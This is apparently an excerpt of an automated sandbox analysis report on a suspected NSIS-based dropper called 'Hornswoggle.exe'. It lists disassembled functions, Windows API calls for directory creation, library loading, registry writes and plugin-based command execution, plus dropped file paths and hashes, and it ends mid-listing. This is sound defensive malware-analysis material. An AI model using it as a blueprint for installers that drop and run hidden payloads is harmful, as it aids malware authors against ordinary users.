                                                        • soft, xrefs: 00402DA6
                                                        • Inst, xrefs: 00402D9D
                                                        • Null, xrefs: 00402DAF
                                                        • "C:\Users\user\Desktop\Hornswoggle.exe", xrefs: 00402CB6
                                                        • C:\Users\user\Desktop, xrefs: 00402D11, 00402D16, 00402D1C
                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402EBF
                                                        • Error launching installer, xrefs: 00402D06
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402CC0, 00402E8E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Hornswoggle.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                        • API String ID: 2803837635-3711215968
                                                        • Opcode ID: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
                                                        • Instruction ID: 6560279c47655c84bfe4d90bfb6f1ef804bba6314c77a30d8371cd5976d9e3e8
                                                        • Opcode Fuzzy Hash: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
                                                        • Instruction Fuzzy Hash: C66103B1A40215ABDB20AF60DE89B9E77B8EB04354F51413BF501B72D1D7BC9E818B9C
                                                        Function 00405E85 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 425 405e85-405e90 426 405e92-405ea1 425->426 427 405ea3-405eb8 425->427 426->427 428 4060ab-4060af 427->428 429 405ebe-405ec9 427->429 431 4060b5-4060bf 428->431 432 405edb-405ee5 428->432 429->428 430 405ecf-405ed6 429->430 430->428 434 4060c1-4060c5 call 405e63 431->434 435 4060ca-4060cb 431->435 432->431 433 405eeb-405ef2 432->433 436 405ef8-405f2d 433->436 437 40609e 433->437 434->435 439 405f33-405f3e GetVersion 436->439 440 406048-40604b 436->440 441 4060a0-4060a6 437->441 442 4060a8-4060aa 437->442 443 405f40-405f44 439->443 444 405f58 439->444 445 40607b-40607e 440->445 446 40604d-406050 440->446 441->428 442->428 443->444 449 405f46-405f4a 443->449 452 405f5f-405f66 444->452 447 406080-406087 call 405e85 445->447 448 40608c-40609c lstrlenA 445->448 450 406060-40606c call 405e63 446->450 451 406052-40605e call 405dc1 446->451 447->448 448->428 449->444 454 405f4c-405f50 449->454 461 406071-406077 450->461 451->461 456 405f68-405f6a 452->456 457 405f6b-405f6d 452->457 454->444 462 405f52-405f56 454->462 456->457 459 405fa6-405fa9 457->459 460 405f6f-405f92 call 405d4a 457->460 466 405fb9-405fbc 459->466 467 405fab-405fb7 GetSystemDirectoryA 459->467 473 405f98-405fa1 call 405e85 460->473 474 40602f-406033 460->474 461->448 465 406079 461->465 462->452 469 406040-406046 call 4060ce 465->469 471 406026-406028 466->471 472 405fbe-405fcc GetWindowsDirectoryA 466->472 470 40602a-40602d 467->470 469->448 470->469 470->474 471->470 475 405fce-405fd8 471->475 472->471 473->470 474->469 478 406035-40603b lstrcatA 474->478 480 405ff2-406008 SHGetSpecialFolderLocation 475->480 481 405fda-405fdd 475->481 478->469 482 406023 480->482 483 40600a-406021 SHGetPathFromIDListA CoTaskMemFree 480->483 481->480 485 405fdf-405fe6 481->485 482->471 483->470 483->482 486 405fee-405ff0 485->486 486->470 486->480
                                                        APIs
                                                        • GetVersion.KERNEL32(?,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,004050B4,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000), ref: 00405F36
                                                        • GetSystemDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405FB1
                                                        • GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405FC4
                                                        • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406000
                                                        • SHGetPathFromIDListA.SHELL32(00000000,Remove folder: ), ref: 0040600E
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00406019
                                                        • lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040603B
                                                        • lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,004050B4,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000), ref: 0040608D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                        • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$error
                                                        • API String ID: 900638850-1737693607
                                                        • Opcode ID: d636f2ff673ad150710af49f9aba5b8caeaeebcde03bf82713dac66827127ef6
                                                        • Instruction ID: a8b5a8e5c19b1295dd56f0f1fbd515d1e85c9865fba9c5a77ffde0f73355f29a
                                                        • Opcode Fuzzy Hash: d636f2ff673ad150710af49f9aba5b8caeaeebcde03bf82713dac66827127ef6
                                                        • Instruction Fuzzy Hash: DE6123B1A40502ABDF219F24CC84BBB3BB4DB45354F15813BE902B62D1D37D4952DB5E
                                                        Function 00401751 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147stringtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 556 401751-401774 call 402a3a call 405942 561 401776-40177c call 405e63 556->561 562 40177e-401790 call 405e63 call 4058d5 lstrcatA 556->562 567 401795-40179b call 4060ce 561->567 562->567 572 4017a0-4017a4 567->572 573 4017a6-4017b0 call 406167 572->573 574 4017d7-4017da 572->574 582 4017c2-4017d4 573->582 583 4017b2-4017c0 CompareFileTime 573->583 576 4017e2-4017fe call 405ad6 574->576 577 4017dc-4017dd call 405ab1 574->577 584 401800-401803 576->584 585 401876-40189f call 40507c call 402f5c 576->585 577->576 582->574 583->582 586 401805-401847 call 405e63 * 2 call 405e85 call 405e63 call 405659 584->586 587 401858-401862 call 40507c 584->587 599 4018a1-4018a5 585->599 600 4018a7-4018b3 SetFileTime 585->600 586->572 619 40184d-40184e 586->619 597 40186b-401871 587->597 601 4028d8 597->601 599->600 603 4018b9-4018c4 CloseHandle 599->603 600->603 606 4028da-4028de 601->606 604 4018ca-4018cd 603->604 605 4028cf-4028d2 603->605 608 4018e2-4018e5 call 405e85 604->608 609 4018cf-4018e0 call 405e85 lstrcatA 604->609 605->601 615 4018ea-402273 call 405659 608->615 609->615 615->605 615->606 619->597 621 401850-401851 619->621 621->587
                                                        APIs
                                                        • lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls,00000000,00000000,00000031), ref: 00401790
                                                        • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls,00000000,00000000,00000031), ref: 004017BA
                                                          • Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                          • Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000), ref: 004050D8
                                                          • Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\), ref: 004050EA
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsnA627.tmp$C:\Users\user\AppData\Local\Temp\nsnA627.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls$ExecToStack$error
                                                        • API String ID: 1941528284-2664401599
                                                        • Opcode ID: 1de87f895a20518b32872598fb73e011091ef9609ce5172346e4bbfbe8c97d7e
                                                        • Instruction ID: 7023b4eef350b7a4ada653e1e4d9b110c77c4e6d7f727d83c91ff2b2eb458513
                                                        • Opcode Fuzzy Hash: 1de87f895a20518b32872598fb73e011091ef9609ce5172346e4bbfbe8c97d7e
                                                        • Instruction Fuzzy Hash: 3941C472A00514BACF107BB5CC85EAF3668EF45369B20863BF121B21E1D67C4A41CBAD
                                                        Function 0040507C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 623 40507c-405091 624 405147-40514b 623->624 625 405097-4050a9 623->625 626 4050b4-4050c0 lstrlenA 625->626 627 4050ab-4050af call 405e85 625->627 628 4050c2-4050d2 lstrlenA 626->628 629 4050dd-4050e1 626->629 627->626 628->624 631 4050d4-4050d8 lstrcatA 628->631 632 4050f0-4050f4 629->632 633 4050e3-4050ea SetWindowTextA 629->633 631->629 634 4050f6-405138 SendMessageA * 3 632->634 635 40513a-40513c 632->635 633->632 634->635 635->624 636 40513e-405141 635->636 636->624
                                                        APIs
                                                        • lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                        • lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                        • lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000), ref: 004050D8
                                                        • SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\), ref: 004050EA
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\
                                                        • API String ID: 2531174081-324549867
                                                        • Opcode ID: 871ddc24a54fb64aeccd7c8069c75cad2e612add14608668d5a5d769126a8d66
                                                        • Instruction ID: 0932fbc12a6b25bcac4b474ac1e4098b180b1803f9783341f4c7184ef00e87b2
                                                        • Opcode Fuzzy Hash: 871ddc24a54fb64aeccd7c8069c75cad2e612add14608668d5a5d769126a8d66
                                                        • Instruction Fuzzy Hash: 7E218C71E00508BADF119FA5CD84EDFBFA9EF04358F14807AF944A6291C7789A41CFA8
                                                        Function 00405542 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 637 405542-40558d CreateDirectoryA 638 405593-4055a0 GetLastError 637->638 639 40558f-405591 637->639 640 4055ba-4055bc 638->640 641 4055a2-4055b6 SetFileSecurityA 638->641 639->640 641->639 642 4055b8 GetLastError 641->642 642->640
                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405585
                                                        • GetLastError.KERNEL32 ref: 00405599
                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055AE
                                                        • GetLastError.KERNEL32 ref: 004055B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                        • API String ID: 3449924974-2230009264
                                                        • Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                        • Instruction ID: 9e56051543debb7748005a245647f72f9f0c442d478d44b0b7514676580bb89d
                                                        • Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                        • Instruction Fuzzy Hash: 2701E571D14259EAEF119BA0CD487EFBBB9EB04354F008176E905B6280D378A604CBAA
                                                        Function 0040618E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 643 40618e-4061ae GetSystemDirectoryA 644 4061b0 643->644 645 4061b2-4061b4 643->645 644->645 646 4061c4-4061c6 645->646 647 4061b6-4061be 645->647 649 4061c7-4061f9 wsprintfA LoadLibraryExA 646->649 647->646 648 4061c0-4061c2 647->648 648->649
                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
                                                        • wsprintfA.USER32 ref: 004061DE
                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%s.dll$UXTHEME$\
                                                        • API String ID: 2200240437-4240819195
                                                        • Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                        • Instruction ID: 17d4186d305cf40b40e49104478d07e272734a7bb4b2e73e379b3f466295ecaf
                                                        • Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                        • Instruction Fuzzy Hash: D1F0FC3095410567DB159768DC0DFFF365CBB08304F140176A546E51D2D574E9288B69
                                                        Function 00401F90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 650 401f90-401f9c 651 401fa2-401fb8 call 402a3a * 2 650->651 652 402057-402059 650->652 662 401fc7-401fd5 LoadLibraryExA 651->662 663 401fba-401fc5 GetModuleHandleA 651->663 653 4021c4-4021c9 call 401423 652->653 660 4028cf-4028de 653->660 665 401fd7-401fe4 GetProcAddress 662->665 666 402050-402052 662->666 663->662 663->665 667 402023-402028 call 40507c 665->667 668 401fe6-401fec 665->668 666->653 672 40202d-402030 667->672 669 402005-402021 668->669 670 401fee-401ffa call 401423 668->670 669->672 670->672 681 401ffc-402003 670->681 672->660 674 402036-40203e call 403783 672->674 674->660 680 402044-40204b FreeLibrary 674->680 680->660 681->672
                                                        APIs
                                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                          • Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000), ref: 004050D8
                                                          • Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\), ref: 004050EA
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                        • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                        • String ID: error
                                                        • API String ID: 2987980305-1574812785
                                                        • Opcode ID: b82c88c6cdd41f668a258d9321a56f749b41029914ab3ade980903f4ce5240ef
                                                        • Instruction ID: 215a549463b1ff6cdb2c8ab56b147df35cc58612cba094cab406bca79a610b2d
                                                        • Opcode Fuzzy Hash: b82c88c6cdd41f668a258d9321a56f749b41029914ab3ade980903f4ce5240ef
                                                        • Instruction Fuzzy Hash: A0212E76904215FBDF217F648E48A6E3670AB45318F30423BF701B62D0D7BC4942DA6E
                                                        Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 682 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 689 4023b0-4023b8 682->689 690 4028cf-4028de 682->690 691 4023c8-4023cb 689->691 692 4023ba-4023c7 call 402a3a lstrlenA 689->692 696 4023db-4023de 691->696 697 4023cd-4023da call 402a1d 691->697 692->691 700 4023e0-4023ea call 402f5c 696->700 701 4023ef-402403 RegSetValueExA 696->701 697->696 700->701 704 402405 701->704 705 402408-4024de RegCloseKey 701->705 704->705 705->690
                                                        APIs
                                                        • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnA627.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsnA627.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
